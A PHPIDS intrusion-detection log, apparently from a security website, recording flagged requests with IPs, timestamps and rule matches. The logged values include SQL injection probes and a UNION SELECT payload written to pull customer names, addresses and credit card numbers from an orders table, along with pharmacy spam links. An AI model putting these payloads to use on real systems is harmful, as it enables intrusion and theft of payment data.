Page:/i.php?page=''
IP:208.80.193.39
Impact:12
Created:2010-05-02 05:20:34
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123207
Name:REQUEST.tab
Value:support</a
Page:/i.php?tab=support</a
IP:41.232.244.131
Impact:8
Created:2010-05-02 05:11:28
Details:
Description: Detects attributes in closing tags and conditional compilation tokens | Tags: xss, csrf | ID: 34

ID:123208
Name:GET.tab
Value:support</a
Page:/i.php?tab=support</a
IP:41.232.244.131
Impact:8
Created:2010-05-02 05:11:28
Details:
Description: Detects attributes in closing tags and conditional compilation tokens | Tags: xss, csrf | ID: 34

ID:123205
Name:REQUEST.bcsi_scan_24E43ADEA8953CDD
Value:JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA==
Page:/i.php?page=security/networkprinterhacking&bcsi_scan_24E43ADEA8953CDD=JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA==&bcsi_scan_filename=i.php
IP:207.46.204.219
Impact:14
Created:2010-05-02 04:39:32
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.6428571428571

ID:123206
Name:GET.bcsi_scan_24E43ADEA8953CDD
Value:JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA==
Page:/i.php?page=security/networkprinterhacking&bcsi_scan_24E43ADEA8953CDD=JO55Ucd5DdwPAraHF7iSrTeXR3YCAAAAWE84AA==&bcsi_scan_filename=i.php
IP:207.46.204.219
Impact:14
Created:2010-05-02 04:39:32
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.6428571428571

ID:123203
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-05-02 04:23:18
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:123204
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated%20target=_parent%20%3EIronGeek.com%20Hacking%20Illustrated%3C/a%3E%0D%0A%09%09%09%09%20%20%20%20%3Cbr%3E%0D%0A%0D%0A%09%09%09%09%20%20%20%20%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-05-02 04:23:18
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:123201
Name:REQUEST.page
Value:security/AQuickIntrotoSniffersCHAR(57, 55)
Page:/i.php?page=security/AQuickIntrotoSniffersCHAR(57,%2055)
IP:67.195.111.36
Impact:12
Created:2010-05-02 02:32:47
Details:
Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40

ID:123202
Name:GET.page
Value:security/AQuickIntrotoSniffersCHAR(57, 55)
Page:/i.php?page=security/AQuickIntrotoSniffersCHAR(57,%2055)
IP:67.195.111.36
Impact:12
Created:2010-05-02 02:32:47
Details:
Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID: 40

ID:123199
Name:REQUEST.page
Value:security/hackingillustrated' and 'a'='a
Page:/i.php?page=security/hackingillustrated'%20and%20'a'='a
IP:58.247.31.139
Impact:34
Created:2010-05-02 02:32:32
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123200
Name:GET.page
Value:security/hackingillustrated' and 'a'='a
Page:/i.php?page=security/hackingillustrated'%20and%20'a'='a
IP:58.247.31.139
Impact:34
Created:2010-05-02 02:32:32
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123197
Name:REQUEST.page
Value:security/hackingillustrated' and user=0 and '1'='1
Page:/i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1
IP:58.247.31.139
Impact:56
Created:2010-05-02 02:32:29
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123198
Name:GET.page
Value:security/hackingillustrated' and user=0 and '1'='1
Page:/i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1
IP:58.247.31.139
Impact:56
Created:2010-05-02 02:32:29
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123195
Name:REQUEST.page
Value:security/hackingillustrated' and user=0 and '1'='1
Page:/i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1
IP:58.247.31.139
Impact:56
Created:2010-05-02 02:32:28
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123196
Name:GET.page
Value:security/hackingillustrated' and user=0 and '1'='1
Page:/i.php?page=security/hackingillustrated'%20and%20user=0%20and%20'1'='1
IP:58.247.31.139
Impact:56
Created:2010-05-02 02:32:28
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123193
Name:REQUEST.page
Value:security/hackingillustrated' and user=0--
Page:/i.php?page=security/hackingillustrated'%20and%20user=0--
IP:58.247.31.139
Impact:32
Created:2010-05-02 02:32:26
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123194
Name:GET.page
Value:security/hackingillustrated' and user=0--
Page:/i.php?page=security/hackingillustrated'%20and%20user=0--
IP:58.247.31.139
Impact:32
Created:2010-05-02 02:32:26
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123191
Name:REQUEST.page
Value:security/hackingillustrated' and user=0--
Page:/i.php?page=security/hackingillustrated'%20and%20user=0--
IP:58.247.31.139
Impact:32
Created:2010-05-02 02:32:24
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123192
Name:GET.page
Value:security/hackingillustrated' and user=0--
Page:/i.php?page=security/hackingillustrated'%20and%20user=0--
IP:58.247.31.139
Impact:32
Created:2010-05-02 02:32:24
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123189
Name:REQUEST.page
Value:security/hackingillustrated and user=0--
Page:/i.php?page=security/hackingillustrated%20and%20user=0--
IP:58.247.31.139
Impact:18
Created:2010-05-02 02:32:23
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123190
Name:GET.page
Value:security/hackingillustrated and user=0--
Page:/i.php?page=security/hackingillustrated%20and%20user=0--
IP:58.247.31.139
Impact:18
Created:2010-05-02 02:32:23
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123187
Name:REQUEST.page
Value:security/hackingillustrated and user=0--
Page:/i.php?page=security/hackingillustrated%20and%20user=0--
IP:58.247.31.139
Impact:18
Created:2010-05-02 02:32:21
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123188
Name:GET.page
Value:security/hackingillustrated and user=0--
Page:/i.php?page=security/hackingillustrated%20and%20user=0--
IP:58.247.31.139
Impact:18
Created:2010-05-02 02:32:21
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123185
Name:REQUEST.page
Value:security/hackingillustrated and user=0 and 1=1
Page:/i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1
IP:58.247.31.139
Impact:12
Created:2010-05-02 02:32:19
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123186
Name:GET.page
Value:security/hackingillustrated and user=0 and 1=1
Page:/i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1
IP:58.247.31.139
Impact:12
Created:2010-05-02 02:32:19
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123183
Name:REQUEST.page
Value:security/hackingillustrated and user=0 and 1=1
Page:/i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1
IP:58.247.31.139
Impact:12
Created:2010-05-02 02:32:18
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123184
Name:GET.page
Value:security/hackingillustrated and user=0 and 1=1
Page:/i.php?page=security/hackingillustrated%20and%20user=0%20and%201=1
IP:58.247.31.139
Impact:12
Created:2010-05-02 02:32:18
Details:
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:123181
Name:REQUEST.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated+target=_parent+%3EIronGeek.com+Hacking+Illustrated%3C/a%3E%0D%0A%09%09%09%09++++%3Cbr%3E%0D%0A%0D%0A%09%09%09%09++++%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-05-01 23:06:48
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:123182
Name:GET.page
Value:security/hackingillustrated target=_parent >IronGeek.com Hacking Illustrated</a> <br> <a href=
Page:/i.php?page=security/hackingillustrated+target=_parent+%3EIronGeek.com+Hacking+Illustrated%3C/a%3E%0D%0A%09%09%09%09++++%3Cbr%3E%0D%0A%0D%0A%09%09%09%09++++%3Ca+href=
IP:66.249.67.227
Impact:8
Created:2010-05-01 23:06:48
Details:
				    <a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:123179
Name:REQUEST.page
Value:security/changemac and 0=1 union select
Page:/i.php?page=security/changemac+and+0=1+union+select+
IP:117.0.100.152
Impact:20
Created:2010-05-01 22:47:19
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123180
Name:GET.page
Value:security/changemac and 0=1 union select
Page:/i.php?page=security/changemac+and+0=1+union+select+
IP:117.0.100.152
Impact:20
Created:2010-05-01 22:47:19
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123177
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-05-01 22:46:22
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123178
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.227
Impact:42
Created:2010-05-01 22:46:22
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123175
Name:REQUEST.mode
Value:/*
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/%2A
IP:67.195.111.36
Impact:6
Created:2010-05-01 19:15:11
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123176
Name:GET.mode
Value:/*
Page:/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10&mode=/%2A
IP:67.195.111.36
Impact:6
Created:2010-05-01 19:15:11
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123173
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:123.19.99.34
Impact:20
Created:2010-05-01 18:40:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123174
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/ike-scan
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan
IP:123.19.99.34
Impact:20
Created:2010-05-01 18:40:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123171
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:123.19.99.34
Impact:20
Created:2010-05-01 18:40:09
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123172
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:123.19.99.34
Impact:20
Created:2010-05-01 18:40:09
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123169
Name:REQUEST.PREF
Value:ID=2283e1cd43badac9:U=129d3114eaa9083d:TM=1265974470:LM=1266026619:GM=1:S=kPg9-hDbFDDD0SkR
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:80.239.242.94
Impact:20
Created:2010-05-01 16:45:52
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:123170
Name:COOKIE.PREF
Value:ID=2283e1cd43badac9:U=129d3114eaa9083d:TM=1265974470:LM=1266026619:GM=1:S=kPg9-hDbFDDD0SkR
Page:/i.php?page=security/zipit-z2-hacking-userland-side-track
IP:80.239.242.94
Impact:20
Created:2010-05-01 16:45:52
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:123167
Name:REQUEST.codeme
Value:Nice, <a href= http://canyousafelytakealevitraa.imagekind.com/#1 >All about can you safely take a levitra along with a penile injection</a> [url=http://canyousafelytakealevitraa.imagekind.com/#1]All about can you safely take a levitra along with a penile injection[/url], wxerb,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 11:06:20
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123168
Name:POST.codeme
Value:Nice, <a href= http://canyousafelytakealevitraa.imagekind.com/#1 >All about can you safely take a levitra along with a penile injection</a> [url=http://canyousafelytakealevitraa.imagekind.com/#1]All about can you safely take a levitra along with a penile injection[/url], wxerb,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 11:06:20
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123165
Name:REQUEST.testimonial_id
Value:-42 union select 1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8 from orders--
Page:/i.php?testimonial_id=-42+union+select+1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_ex
IP:67.195.111.36
Impact:24
Created:2010-05-01 10:58:45
Details:
Description: Detects JavaScript string properties and methods | Tags: xss, csrf, id, rfe | ID: 19
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123166
Name:GET.testimonial_id
Value:-42 union select 1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires),4,5,6,7,8 from orders--
Page:/i.php?testimonial_id=-42+union+select+1,2,concat(date_purchased,0x3a,billing_name,0x3a,billing_street_address,0x3a,billing_city,0x3a,billing_postcode,0x3a,billing_state,0x3a,billing_country,0x3a,customers_telephone,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_ex
IP:67.195.111.36
Impact:24
Created:2010-05-01 10:58:45
Details:
Description: Detects JavaScript string properties and methods | Tags: xss, csrf, id, rfe | ID: 19
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123163
Name:REQUEST.page
Value:videos/wardrive1 href="http://www.irongeek.com/i.php?
Page:/i.php?page=videos/wardrive1%20href=%22http://www.irongeek.com/i.php?
IP:67.195.111.36
Impact:8
Created:2010-05-01 10:16:23
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:123164
Name:GET.page
Value:videos/wardrive1 href="http://www.irongeek.com/i.php?
Page:/i.php?page=videos/wardrive1%20href=%22http://www.irongeek.com/i.php?
IP:67.195.111.36
Impact:8
Created:2010-05-01 10:16:23
Details:
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17

ID:123161
Name:REQUEST.codeme
Value:Where it is possible to buy the, <a href= http://prescriptionandconsultati.imagekind.com/#1 >prescription and consultation online for adipex</a> [url=http://prescriptionandconsultati.imagekind.com/#1]prescription and consultation online for adipex[/url], 73773,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 10:16:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123162
Name:POST.codeme
Value:Where it is possible to buy the, <a href= http://prescriptionandconsultati.imagekind.com/#1 >prescription and consultation online for adipex</a> [url=http://prescriptionandconsultati.imagekind.com/#1]prescription and consultation online for adipex[/url], 73773,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 10:16:02
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123159
Name:REQUEST.page
Value:videos/pn12/i.php?page=links
Page:/i.php?page=videos/pn12/i.php?page=links
IP:204.236.253.89
Impact:10
Created:2010-05-01 09:37:25
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123160
Name:GET.page
Value:videos/pn12/i.php?page=links
Page:/i.php?page=videos/pn12/i.php?page=links
IP:204.236.253.89
Impact:10
Created:2010-05-01 09:37:25
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123157
Name:REQUEST.page
Value:videos/pn12/i.php?page=contact
Page:/i.php?page=videos/pn12/i.php?page=contact
IP:204.236.253.89
Impact:10
Created:2010-05-01 09:37:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123158
Name:GET.page
Value:videos/pn12/i.php?page=contact
Page:/i.php?page=videos/pn12/i.php?page=contact
IP:204.236.253.89
Impact:10
Created:2010-05-01 09:37:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123155
Name:REQUEST.codeme
Value:Your Site Is Great!, <a href= http://discountviagrafurthermore.imagekind.com/ >discount viagra furthermore cheap adipex reviews</a>, [url= http://discountviagrafurthermore.imagekind.com/ ]discount viagra furthermore cheap adipex reviews[/url], 56349,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-05-01 09:26:09
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123156
Name:POST.codeme
Value:Your Site Is Great!, <a href= http://discountviagrafurthermore.imagekind.com/ >discount viagra furthermore cheap adipex reviews</a>, [url= http://discountviagrafurthermore.imagekind.com/ ]discount viagra furthermore cheap adipex reviews[/url], 56349,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-05-01 09:26:09
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123153
Name:REQUEST.codeme
Value:So where it to find, <a href= http://discountviagrafurthermore.imagekind.com/#1 >discount viagra furthermore cheap adipex reviews</a> [url=http://discountviagrafurthermore.imagekind.com/#1]discount viagra furthermore cheap adipex reviews[/url], :-(,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-05-01 08:36:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123154
Name:POST.codeme
Value:So where it to find, <a href= http://discountviagrafurthermore.imagekind.com/#1 >discount viagra furthermore cheap adipex reviews</a> [url=http://discountviagrafurthermore.imagekind.com/#1]discount viagra furthermore cheap adipex reviews[/url], :-(,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-05-01 08:36:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123151
Name:REQUEST.codeme
Value:Best, <a href= http://howlongdoesittakeadipexto.imagekind.com/#1 >Only how long does it take adipex to work</a> [url=http://howlongdoesittakeadipexto.imagekind.com/#1]Only how long does it take adipex to work[/url], kscrsp,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-05-01 07:45:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123152
Name:POST.codeme
Value:Best, <a href= http://howlongdoesittakeadipexto.imagekind.com/#1 >Only how long does it take adipex to work</a> [url=http://howlongdoesittakeadipexto.imagekind.com/#1]Only how long does it take adipex to work[/url], kscrsp,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-05-01 07:45:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123149
Name:REQUEST.page
Value:reviews/dreamhost/.php?page='
Page:/i.php?page=reviews/dreamhost/.php?page='
IP:79.170.45.240
Impact:10
Created:2010-05-01 07:28:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123150
Name:GET.page
Value:reviews/dreamhost/.php?page='
Page:/i.php?page=reviews/dreamhost/.php?page='
IP:79.170.45.240
Impact:10
Created:2010-05-01 07:28:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123147
Name:REQUEST.codeme
Value:I like your work!, <a href= http://howlongdoestramadolstayin.imagekind.com/#1 >Only how long does tramadol stay in your system</a> [url=http://howlongdoestramadolstayin.imagekind.com/#1]Only how long does tramadol stay in your system[/url], >:-)),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:48
Created:2010-05-01 06:55:44
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123148
Name:POST.codeme
Value:I like your work!, <a href= http://howlongdoestramadolstayin.imagekind.com/#1 >Only how long does tramadol stay in your system</a> [url=http://howlongdoestramadolstayin.imagekind.com/#1]Only how long does tramadol stay in your system[/url], >:-)),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:48
Created:2010-05-01 06:55:44
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123143
